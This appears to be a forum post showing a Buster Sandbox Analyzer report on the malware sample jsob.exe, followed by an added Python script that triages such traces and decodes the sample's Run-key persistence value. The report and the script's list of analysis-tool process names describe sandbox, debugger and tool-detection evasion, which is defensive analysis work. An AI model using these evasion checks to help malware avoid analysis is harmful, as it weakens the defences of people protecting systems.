   * Contains string Anti-Malware Analyzer routine: Norman Sandbox detection ("CurrentUser")
   * Contains string Checks for FireFox browser software presence ("FIREFOX.EXE")

Code:
Report generated with Buster Sandbox Analyzer 1.85 at 15:56:27 on 07/02/2013

Detailed report of suspicious malware actions:

Anti-Malware Analyzer routine: Norman Sandbox detection
Checked for debuggers
Checks for Chrome browser software presence
Checks for FireFox browser software presence
Created a mutex named: CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: MSCTF.Shared.MUTEX.IKG
Defined registry AutoStart location created or modified: user\current\software\Microsoft\Windows\CurrentVersion\RUN\jsob.exe = 43003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C007200330032005C004500730063007200690074006F00720069006F005C0049006E006600650063007400330064005C0043006F006D00700072006F00760061006E00740065005C006A0073006F0062002E006500780065000000
Enumerated running processes
Traces of AutoStart registry key

Continues...
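Added example, not code from the post above, from its author or from Buster Sandbox Analyzer: a small Python triage helper for BSA API-monitor traces like the one posted for jsob.exe. It parses the `Func(args) [path\to\sample.exe]` line format shown in the trace, collects the process names the sample opened or compared with `lstrcmpi`, and reports which of them are analysis tools, whether a debugger check and process enumeration were seen, and which files were created; it also decodes the REG_BINARY Run-key value that BSA prints as hex (UTF-16LE, NUL-terminated). The caveat it encodes is the one the trace itself raises: because the sample also opens ordinary processes (explorer.exe, notepad.exe), the OpenProcess calls look like a walk over the whole process list rather than a targeted check for tools, so the tool names found are partly just what the VM happened to be running. The `ANALYSIS_TOOLS` set starts from names seen in the trace and adds a few assumed common tools; `SAMPLE_LOG` is a constructed subset of the posted lines with the sample path shortened; `RUN_VALUE_HEX` is the value from the BSA report.

```python
"""Triage of a Buster Sandbox Analyzer (BSA) API-monitor trace.

Added example; not code from the original post or from BSA. It parses lines in
the format the post shows, ``Func(args) [path\\to\\sample.exe]``, and reports
the behaviours visible in the jsob.exe trace: debugger check, process
enumeration, analysis tools touched, files created, and the decoded Run value.
"""
import re
from collections import defaultdict

# Func(args) [process]. Args may themselves contain parentheses
# (e.g. "PE Explorer (portable).exe"), so the greedy .* backtracks to the last ") [".
LINE_RE = re.compile(r'^(?P<api>\w+)\((?P<args>.*)\) \[(?P<proc>[^\]]*)\]\s*$')

# Lower-case process names of analysis tooling. Names seen in the post's trace
# come first; the last row is an assumed addition of other common tools.
ANALYSIS_TOOLS = {
    'wireshark.exe', 'dumpcap.exe', 'sniff_hit.exe', 'procexp.exe', 'idag.exe',
    'pe explorer (portable).exe', 'evo_dbg.exe', 'bsa.exe', 'sbiectrl.exe',
    'sbiesvc.exe', 'sandboxierpcss.exe', 'sandboxiedcomlaunch.exe',
    'vboxtray.exe', 'vboxservice.exe',
    'ollydbg.exe', 'procmon.exe', 'x64dbg.exe', 'fiddler.exe',  # assumed additions
}

# Constructed subset of the post's trace (sample path shortened for the example).
SAMPLE_LOG = """\
IsDebuggerPresent() [c:\\samples\\jsob.exe]
OpenProcess(explorer.exe) [c:\\samples\\jsob.exe]
OpenProcess(SbieCtrl.exe) [c:\\samples\\jsob.exe]
OpenProcess(wireshark.exe) [c:\\samples\\jsob.exe]
OpenProcess(notepad.exe) [c:\\samples\\jsob.exe]
OpenProcess(PE Explorer (portable).exe) [c:\\samples\\jsob.exe]
CreateToolhelp32Snapshot(TH32C2_SNAPPROCESS,0) [c:\\samples\\jsob.exe]
lstrcmpi(VBoxService.exe,explorer.exe) [c:\\samples\\jsob.exe]
lstrcmpi(procexp.exe,explorer.exe) [c:\\samples\\jsob.exe]
CreateFile(c:\\wina\\s33ass.txt) [c:\\samples\\jsob.exe]
"""

# REG_BINARY value of HKCU\...\CurrentVersion\Run\jsob.exe as BSA printed it in the post.
RUN_VALUE_HEX = (
    "43003A005C0044006F00630075006D0065006E0074007300200061006E0064002000"
    "530065007400740069006E00670073005C007200330032005C004500730063007200"
    "690074006F00720069006F005C0049006E006600650063007400330064005C004300"
    "6F006D00700072006F00760061006E00740065005C006A0073006F0062002E006500"
    "780065000000"
)


def parse_line(line):
    """Return {'api', 'args', 'proc'} for one trace line, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def parse_log(text):
    """Parse a whole trace, skipping non-matching lines such as 'Executing: ...'."""
    return [ev for ev in (parse_line(ln) for ln in text.splitlines()) if ev]


def triage(events):
    """Summarise anti-analysis, process-enumeration and file activity in the trace."""
    by_api = defaultdict(list)
    for ev in events:
        by_api[ev['api']].append(ev['args'])

    # Every process name the sample opened or compared, lower-cased for matching.
    touched = {a.lower() for a in by_api['OpenProcess']}
    for args in by_api['lstrcmpi']:
        touched.update(p.strip().lower() for p in args.split(','))

    tools = sorted(touched & ANALYSIS_TOOLS)
    others = sorted(touched - ANALYSIS_TOOLS)
    return {
        'debugger_check': 'IsDebuggerPresent' in by_api,
        'process_enumeration': bool(by_api['CreateToolhelp32Snapshot']
                                    or by_api['QuerySystemInformation']),
        'analysis_tools_touched': tools,
        # Caveat: if ordinary processes were opened too (explorer.exe, notepad.exe),
        # the sample is probably walking the whole process list, and the tool
        # names are simply what the analysis VM was running at the time.
        'other_processes_touched': others,
        'targeted_tool_check': bool(tools) and not others,
        'files_created': list(by_api['CreateFile']),
    }


def decode_run_value(hex_value):
    """Decode a REG_BINARY Run value that BSA prints as hex: UTF-16LE, NUL-terminated."""
    raw = bytes.fromhex(hex_value)
    if len(raw) % 2:
        raise ValueError('UTF-16LE data must have an even number of bytes')
    return raw.decode('utf-16-le').rstrip('\x00')


if __name__ == '__main__':
    for key, value in triage(parse_log(SAMPLE_LOG)).items():
        print(f'{key}: {value}')
    print('Run value ->', decode_run_value(RUN_VALUE_HEX))
```

Feed it the full "Code:" trace above instead of `SAMPLE_LOG` and `targeted_tool_check` comes out false for the same reason as in the sample: explorer.exe, ctfmon.exe, notepad.exe and the sample's own jsobs.exe are opened alongside wireshark.exe and procexp.exe, which is a process walk, not a tool blacklist. The decoded Run value is the same path the BSA report shows in clear text, which confirms the persistence entry points back at the dropped jsob.exe.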